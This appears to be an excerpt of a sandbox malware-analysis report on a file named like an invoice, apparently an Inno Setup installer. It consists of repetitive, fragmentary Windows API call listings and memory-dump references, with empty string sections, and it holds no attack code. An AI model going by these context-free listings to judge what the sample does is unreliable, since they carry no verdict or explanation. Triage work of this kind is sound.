    APIs
    • SetErrorMode.KERNEL32(00000001,00000000,004C0D8C), ref: 004C0BFC
    • SetErrorMode.KERNEL32(?,004C0D66,004C0D5F,?,00000001,00000000,004C0D8C), ref: 004C0D59
      • Part of subcall function 004BF870: GetActiveWindow.USER32 ref: 004BF88B
      • Part of subcall function 004BF870: SHPathPrepareForWriteW.SHELL32(?,00000000,00000000,00000000), ref: 004BF8D0
      • Part of subcall function 004BF870: SetActiveWindow.USER32(?), ref: 004BF912
      • Part of subcall function 004C0FEC: SendMessageW.USER32(00000000,0000113F,00000000), ref: 004C1037
    • FindFirstFileW.KERNEL32(00000000,?,00000000,004C0D5F,?,00000001,00000000,004C0D8C), ref: 004C0C8F
      • Part of subcall function 004BF530: SHGetFileInfoW.SHELL32(00000000,00000000,?,000002B4,00000200), ref: 004BF555
      • Part of subcall function 004C05DC: SendMessageW.USER32(00000000,00001132,00000000,?), ref: 004C06C2
    • FindNextFileW.KERNEL32(000000FF,?,00000000,004C0D41,?,00000000,?,00000000,004C0D5F,?,00000001,00000000,004C0D8C), ref: 004C0D21
    • FindClose.KERNEL32(000000FF,004C0D48,004C0D41,?,00000000,?,00000000,004C0D5F,?,00000001,00000000,004C0D8C), ref: 004C0D3B
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • SetErrorMode.KERNEL32(00000001,00000000,004C1272), ref: 004C1103
    • FindFirstFileW.KERNEL32(00000000,?,00000000,004C1240,?,00000001,00000000,004C1272), ref: 004C1149
    • FindClose.KERNEL32(000000FF,004C1229,004C1222,?,00000000,?,00000000,004C1240,?,00000001,00000000,004C1272), ref: 004C121C
      • Part of subcall function 004C06D0: SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 004C0714
      • Part of subcall function 004BF530: SHGetFileInfoW.SHELL32(00000000,00000000,?,000002B4,00000200), ref: 004BF555
      • Part of subcall function 004C05DC: SendMessageW.USER32(00000000,00001132,00000000,?), ref: 004C06C2
    • FindNextFileW.KERNEL32(000000FF,?,00000000,004C1222,?,00000000,?,00000000,004C1240,?,00000001,00000000,004C1272), ref: 004C11FE
    • SetErrorMode.KERNEL32(?,004C1247,004C1240,?,00000001,00000000,004C1272), ref: 004C123A
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • CreateFileW.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000), ref: 004808EE
    • DeviceIoControl.KERNEL32(00000000,0009C040,?,00000002,00000000,00000000,?,00000000), ref: 00480918
    • GetLastError.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,004AD778,00000000,004AD799), ref: 00480925
    • CloseHandle.KERNEL32(00000000), ref: 0048092D
    • SetLastError.KERNEL32(00000000,00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,004AD778,00000000,004AD799), ref: 00480933
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • LoadLibraryExW.KERNEL32(00000000,00000000,00000008,?,?,?,00000000,004A1C86,?,?,?,?,00000000,00000000), ref: 004A1BB3
    • LoadLibraryW.KERNEL32(00000000), ref: 004A1BC5
    • GetProcAddress.KERNEL32(00000000,00000000,?,?,00000000,004A1C86,?,?,?,?,00000000,00000000), ref: 004A1C35
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • IsIconic.USER32(?), ref: 004E68AC
    • GetWindowLongW.USER32(00000000,000000F0), ref: 004E68CC
    • ShowWindow.USER32(00000000,00000005), ref: 004E68F0
    • ShowWindow.USER32(00000000,00000000), ref: 004E6906
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • GetLastError.KERNEL32(00000000,00432940,?,00000000,?,00432958,00000000,00434B6B,00000000,00000000,00434D0B,?,00000000,00000054,?,00000000), ref: 004328C4
    • FormatMessageW.KERNEL32(00001000,00000000,00000000,00000400,?,00000100,00000000,00000000,00432940,?,00000000,?,00432958,00000000,00434B6B,00000000), ref: 004328EA
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • FindFirstFileW.KERNEL32(00000000,?,00000000,004BF50E), ref: 004BF492
    • FindNextFileW.KERNEL32(000000FF,?,00000000,004BF4EE,?,00000000,?,00000000,004BF50E), ref: 004BF4CE
    • FindClose.KERNEL32(000000FF,004BF4F5,004BF4EE,?,00000000,?,00000000,004BF50E), ref: 004BF4E8
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
      • Part of subcall function 004ACF58: Wow64DisableWow64FsRedirection.KERNEL32(?,00000000,004AD572,?,00000000,00000000,00000000,00000000,?,004FE5FF,00000000,004FE609,?,00000000,00000000,00000000), ref: 004ACF73
      • Part of subcall function 004ACF58: SetLastError.KERNEL32(00000001,00000000,004AD572,?,00000000,00000000,00000000,00000000,?,004FE5FF,00000000,004FE609,?,00000000,00000000,00000000), ref: 004ACF8A
    • FindFirstFileW.KERNEL32(00000000,?,00000000,004AD2F7,?,?,?,00000000), ref: 004AD2D1
    • GetLastError.KERNEL32(00000000,?,00000000,004AD2F7,?,?,?,00000000), ref: 004AD2D9
      • Part of subcall function 004ACF94: Wow64RevertWow64FsRedirection.KERNEL32(?,004AD5BB,004AD5C3,?,00000000,00000000,00000000,00000000,?,004FE5FF,00000000,004FE609,?,00000000,00000000,00000000), ref: 004ACF9D
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • InitializeSecurityDescriptor.ADVAPI32(00000001,00000001), ref: 00480E45
    • SetSecurityDescriptorDacl.ADVAPI32(00000000,000000FF,00000000,00000000,00000001,00000001), ref: 00480E55
      • Part of subcall function 00409458: CreateMutexW.KERNEL32(?,?,?,?,004FE333,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,004FE668,?,?,00000000,?), ref: 0040946E
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 004B282E
    • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 004B283B
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 00410FDE
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 00410FDE
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • GetLocaleInfoW.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,00413044,00000000,0041326E,?,?,00000000,00000000), ref: 0041101F
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • GetLocaleInfoW.KERNEL32(00000000,20001004,00000000,00000002,00000000,?,?,004B0EAB,?,00000001,00000000), ref: 004B0DC2
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • LoadLibraryW.KERNEL32(uxtheme.dll), ref: 004389CD
      • Part of subcall function 00409620: GetProcAddress.KERNEL32(?,?,00000000,00409683,?,?,?,00000000,?,004FE94D,00000000,user32.dll,DisableProcessWindowsGhosting,005015C1,00000001,00000000), ref: 00409644
      • Part of subcall function 00409620: GetProcAddress.KERNEL32(?,00000000,00000000,00409683,?,?,?,00000000,?,004FE94D,00000000,user32.dll,DisableProcessWindowsGhosting,005015C1,00000001,00000000), ref: 00409666
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
      • Part of subcall function 004A4E40: GetVersionExW.KERNEL32(00000114), ref: 004A4E5D
      • Part of subcall function 004A4E94: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004A4EAC
    • LoadLibraryW.KERNEL32(00000000), ref: 004A4F24
      • Part of subcall function 00409620: GetProcAddress.KERNEL32(?,?,00000000,00409683,?,?,?,00000000,?,004FE94D,00000000,user32.dll,DisableProcessWindowsGhosting,005015C1,00000001,00000000), ref: 00409644
      • Part of subcall function 00409620: GetProcAddress.KERNEL32(?,00000000,00000000,00409683,?,?,?,00000000,?,004FE94D,00000000,user32.dll,DisableProcessWindowsGhosting,005015C1,00000001,00000000), ref: 00409666
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • GetModuleHandleW.KERNEL32(oleaut32.dll), ref: 00415609
      • Part of subcall function 004155D4: GetProcAddress.KERNEL32(00000000), ref: 004155ED
    Strings
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • CreateCompatibleBitmap.GDI32(?,00000001,00000001), ref: 00432B3F
    • SelectObject.GDI32(?,?), ref: 00432B54
    • MaskBlt.GDI32(?,?,?,?,?,?,00000000,00431C22,?,?,?,CCAA0029), ref: 00432B98
    • SelectObject.GDI32(?,?), ref: 00432BB2
    • DeleteObject.GDI32(?), ref: 00432BBE
    • CreateCompatibleDC.GDI32(00000000), ref: 00432BD2
    • CreateCompatibleBitmap.GDI32(?,?,?), ref: 00432BF3
    • SelectObject.GDI32(?,?), ref: 00432C08
    • SelectPalette.GDI32(?,870801FD,00000000), ref: 00432C1C
    • SelectPalette.GDI32(?,?,00000000), ref: 00432C2E
    • SelectPalette.GDI32(?,00000000,000000FF), ref: 00432C43
    • SelectPalette.GDI32(?,870801FD,000000FF), ref: 00432C59
    • RealizePalette.GDI32(?), ref: 00432C65
    • StretchBlt.GDI32(?,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 00432C87
    • StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,00000000,00431C22,?,?,00440328), ref: 00432CA9
    • SetTextColor.GDI32(?,00000000), ref: 00432CB1
    • SetBkColor.GDI32(?,00FFFFFF), ref: 00432CBF
    • StretchBlt.GDI32(?,?,?,?,?,?,?,?,?,?,008800C6), ref: 00432CEB
    • StretchBlt.GDI32(?,?,?,?,?,?,00000000,00000000,?,?,00660046), ref: 00432D10
    • SetTextColor.GDI32(?,00431C22), ref: 00432D1A
    • SetBkColor.GDI32(?,00000000), ref: 00432D24
    • SelectObject.GDI32(?,00000000), ref: 00432D37
    • DeleteObject.GDI32(?), ref: 00432D40
    • SelectPalette.GDI32(?,00000000,00000000), ref: 00432D62
    • DeleteDC.GDI32(?), ref: 00432D6B
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
